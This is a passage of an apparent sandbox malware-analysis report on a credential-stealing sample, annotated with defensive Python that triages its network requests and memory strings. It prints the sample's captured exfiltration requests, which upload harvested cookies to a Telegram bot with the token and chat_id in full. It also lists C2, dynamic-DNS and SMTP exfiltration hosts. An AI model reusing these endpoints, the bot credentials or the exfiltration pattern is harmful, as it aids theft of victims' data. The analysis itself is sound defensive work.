Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2018/02/2025%20/%2014:26:15%0D%0ACountry%20Name:%20United%20States%0D%0A[%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: POST /bot7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k/sendDocument?chat_id=6851554211&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd502839ff0e82 | Host: api.telegram.org | Content-Length: 1281
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2018/02/2025%20/%2014:26:25%0D%0ACountry%20Name:%20United%20States%0D%0A[%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k/sendDocument?chat_id=6851554211&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd50284136df60 | Host: api.telegram.org | Content-Length: 1281
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 78.135.65.4 78.135.65.4
                Source: Joe Sandbox ViewASN Name: PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49791 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49880 -> 193.122.130.0:80 (port 80 is used only for the checkip.dyndns.org requests in this capture, so 193.122.130.0 is the resolved address of that host; the 40 GET requests travel over these two keep-alive connections)
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6 -> 104.21.16.1:443, fired on 16 connections (source ports 49834, 49843, 49853, 49863, 49874, 49896, 49902, 49911, 49925, 49939, 49944, 49951, 64729, 64736, 64742, 64752)
Source: global traffic | TCP traffic: 192.168.2.6:64730 -> 78.135.65.4:587 (SMTP submission port; together with the DNS query for mail.bteenerji.com and the http://mail.bteenerji.com string in memory this is consistent with a mail-based exfiltration channel alongside Telegram)
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org (identical request listed 7 times)
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org (identical request listed 11 times; the report lists 40 of these in total. The fixed MSIE 6.0 / .NET CLR 1.0.3705 User-Agent is sent by no current browser, and combined with the checkip.dyndns.org host it is the external-IP lookup this family performs before building its reports)
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49815 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49909 version: TLS 1.0 (a client negotiating TLS 1.0 in 2025 is itself anomalous and a usable network indicator; the sessions to 149.154.167.220 later in this section use TLS 1.2)
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 (listed 4 times)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (listed 4 times; both addresses belong to Cloudflare's resolver infrastructure)
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org (identical request listed 7 times; 8.46.123.189 is presumably the public address returned by the checkip.dyndns.org lookup, now resolved to a country for the "Country Name" field of the Telegram message)
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2018/02/2025%20/%2014:26:15%0D%0ACountry%20Name:%20United%20States%0D%0A[%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive (empty bot token and chat_id: this notifier was never configured, and the 404 responses listed further down are Telegram's answer to it)
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org (identical request listed 8 times)
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2018/02/2025%20/%2014:26:25%0D%0ACountry%20Name:%20United%20States%0D%0A[%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive (second attempt of the unconfigured notifier, ten seconds after the first; again without bot token or chat_id)
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org (identical request listed 7 times)
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org (identical request listed 11 times)
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: mail.bteenerji.com
Source: unknown | HTTP traffic detected: POST /bot7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k/sendDocument?chat_id=6851554211&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd502839ff0e82 | Host: api.telegram.org | Content-Length: 1281
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Tue, 18 Feb 2025 19:26:17 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Tue, 18 Feb 2025 19:26:28 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection (these two 404s are Telegram's answer to the two /bot/sendMessage requests that carried no bot token: their message text is stamped 14:26:15 and 14:26:25, which is 19:26:15 and 19:26:25 UTC if the analysis VM runs at UTC-5 as the five-hour offset suggests. A 55-byte application/json body is exactly the size of Telegram's standard {"ok":false,"error_code":404,"description":"Not Found"} reply, so the unconfigured notifier delivered nothing; no error response is listed for the sendDocument uploads made with the valid token)
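The request lines above, triaged in code. This is an added example written for this page, not code from Joe Sandbox or from the sample; the four requests are transcribed from the report into a constructed list (with headers separated by CRLF, which the report prints run together), and the field names of the returned dicts are the example's own. It sorts requests into the three behaviours the capture shows (external-IP lookup with the fixed legacy User-Agent, geolocation lookup, Telegram Bot API exfiltration), pulls the bot token and chat_id out of the Telegram URLs, and flags requests whose token is empty, which are the ones Telegram answers with 404.

```python
"""Triage of HTTP requests from a sandbox capture (added example, not
part of the Joe Sandbox report)."""
import re
from urllib.parse import urlsplit, parse_qs

# Fixed User-Agent seen on every checkip.dyndns.org request in the report.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
# Bot API paths look like /bot<token>/<method>; an empty token is still a match.
TELEGRAM_PATH = re.compile(r"^/bot([^/]*)/([A-Za-z]+)$")

# Requests transcribed from the report (constructed sample input).
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nUser-Agent: " + LEGACY_UA + "\r\nHost: checkip.dyndns.org\r\n\r\n",
    "GET /xml/8.46.123.189 HTTP/1.1\r\nHost: reallyfreegeoip.org\r\nConnection: Keep-Alive\r\n\r\n",
    "POST /bot7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k/sendDocument"
    "?chat_id=6851554211&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C"
    "%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1\r\n"
    "Content-Type: multipart/form-data; boundary=------------------------8dd502839ff0e82\r\n"
    "Host: api.telegram.org\r\nContent-Length: 1281\r\n\r\n",
    "GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0A"
    "Country%20Name:%20United%20States HTTP/1.1\r\nHost: api.telegram.org\r\n\r\n",
]


def parse_request(raw):
    """Split a raw HTTP request into method, target and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def classify(req):
    """Return a finding dict for one parsed request, or None if unremarkable."""
    host = req["headers"].get("host", "").lower()
    url = urlsplit(req["target"])
    if host == "checkip.dyndns.org":
        return {
            "kind": "external_ip_lookup",
            "host": host,
            # No current client sends this UA; it is the strongest per-request
            # handle the capture offers, since the destination IP is shared.
            "legacy_ua": req["headers"].get("user-agent") == LEGACY_UA,
        }
    if host == "reallyfreegeoip.org" and url.path.startswith("/xml/"):
        return {"kind": "geolocation", "host": host, "looked_up_ip": url.path[len("/xml/"):]}
    if host == "api.telegram.org":
        m = TELEGRAM_PATH.match(url.path)
        if not m:
            return None
        token, api_method = m.groups()
        # keep_blank_values so that "chat_id=" survives as an empty string
        query = parse_qs(url.query, keep_blank_values=True)
        chat_id = query.get("chat_id", [""])[0]
        return {
            "kind": "telegram_exfil",
            "host": host,
            "api_method": api_method,
            "bot_token": token,
            "chat_id": chat_id,
            # caption (sendDocument) or text (sendMessage); parse_qs already URL-decoded it
            "message": (query.get("caption") or query.get("text") or [""])[0],
            # Empty token or chat_id: this component was never configured and
            # Telegram answers the request with 404 Not Found.
            "unconfigured": token == "" or chat_id == "",
        }
    return None


def triage(raw_requests):
    """Classify every request; returns the findings in input order."""
    findings = []
    for raw in raw_requests:
        finding = classify(parse_request(raw))
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_REQUESTS):
        print(finding)
```

The bot token and chat_id are what to report to Telegram's abuse contact and to put in the incident record; blocking api.telegram.org outright is an organisational decision because legitimate clients use it too. The legacy User-Agent toward checkip.dyndns.org, the TLS 1.0 handshakes and the Telegram path pattern are better network detection handles than the Cloudflare and Telegram IP addresses, which are shared infrastructure.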
Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.000000000340E000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.000000000345D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Quote_items1&2.bat.exe, 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Quote_items1&2.bat.exe, 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003221000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: Quote_items1&2.bat.exe, 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003221000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.000000000340E000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.000000000345D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://bteenerji.com
Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003221000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003221000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: Quote_items1&2.bat.exe, 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.000000000340E000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.000000000345D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.bteenerji.com
Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000C.00000002.2459417256.00000000037F1000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003221000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Quote_items1&2.bat.exe, 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003221000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081 (the three :8081 dynamic-DNS hosts and the 51.38.247.67:8081/_send_.php endpoint sit in the unpacked payload image at 0x140002000, the same region the Snake Keylogger Yara rule matches further down, so they are part of the embedded configuration rather than harvested data; none of them is contacted during this run, which used Telegram and SMTP instead. Trailing characters such as "?L", "/q" and "Capplication/x-www-form-urlencoded" are adjacent memory bytes, not part of the URLs)
Source: wJFLKBSbTtvP.exe, 0000000F.00000002.4014178087.000000001CEA0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.00000000131F9000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.000000001337D000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000133CC000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.000000001324B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q= (this and the following ecosia, yahoo, duckduckgo, google and office.com URLs are default search-provider and new-tab entries read out of the victim's browser profiles while they were harvested; they are not indicators)
Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.000000000342E000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003311000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.000000000347D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: Quote_items1&2.bat.exe, 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.000000000342E000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003311000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.000000000347D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20a
Source: wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.000000000347D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7354418955:AAH10FAR8IByRBtd_Qs69uwN7lnhl-2X18k/sendDocument?chat_id=6851
Source: Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.00000000131F9000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.000000001337D000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000133CC000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.000000001324B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.00000000131F9000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.000000001337D000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000133CC000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.000000001324B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.00000000131F9000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.000000001337D000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000133CC000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.000000001324B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003427000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.000000000339E000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.00000000033ED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en8
Source: Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.00000000131F9000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.000000001337D000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000133CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.00000000131F9000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.000000001337D000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000133CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.00000000131F9000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.000000001337D000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000133CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.0000000003245000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003295000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: Quote_items1&2.bat.exe, 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.0000000003245000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003295000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.00000000032C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.00000000131F9000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.000000001337D000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000133CC000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.000000001324B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.00000000131F9000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.000000001337D000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000133CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003427000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003422000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/8
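A way to sort the memory strings above into indicators and noise, as an added example (not Joe Sandbox code and not the sample's). The string list is transcribed from the report; the category names, the dynamic-DNS suffix list and the browser-noise host list are this example's own assumptions, and the fused strings (favicon.icohttps://...) are left out because they would need splitting first. The point is that a stealer's memory dump mixes the operator's infrastructure, the third-party services the family leans on, and URLs copied out of the victim's browser profiles, and only the first two belong in a blocklist.

```python
"""Host-level triage of URL strings recovered from memory (added example,
not part of the Joe Sandbox report)."""
from urllib.parse import urlsplit

# Dynamic-DNS suffixes (Duck DNS; kozow.com and dns.army are Dynu free domains).
DYNDNS_SUFFIXES = (".duckdns.org", ".kozow.com", ".dns.army")
# Third-party services this family is observed using, per the report.
RECON_HOSTS = {"checkip.dyndns.org", "reallyfreegeoip.org"}
EXFIL_HOSTS = {"api.telegram.org"}
# Hosts that only show up because the sample read browser profile data.
BROWSER_NOISE = ("ecosia.org", "duckduckgo.com", "search.yahoo.com",
                 "google.com", "office.com")

# Strings transcribed from the report (constructed input; some carry a
# stray trailing byte such as "?L", "q" or "8" copied from adjacent memory).
SAMPLE_STRINGS = [
    "http://51.38.247.67:8081/_send_.php?L",
    "http://aborters.duckdns.org:8081",
    "http://anotherarmy.dns.army:8081",
    "http://varders.kozow.com:8081",
    "http://bteenerji.com",
    "http://mail.bteenerji.com",
    "http://checkip.dyndns.org/q",
    "https://reallyfreegeoip.org/xml/8.46.123.189",
    "https://api.telegram.org/bot",
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name",
    "https://ac.ecosia.org/autocomplete?q=",
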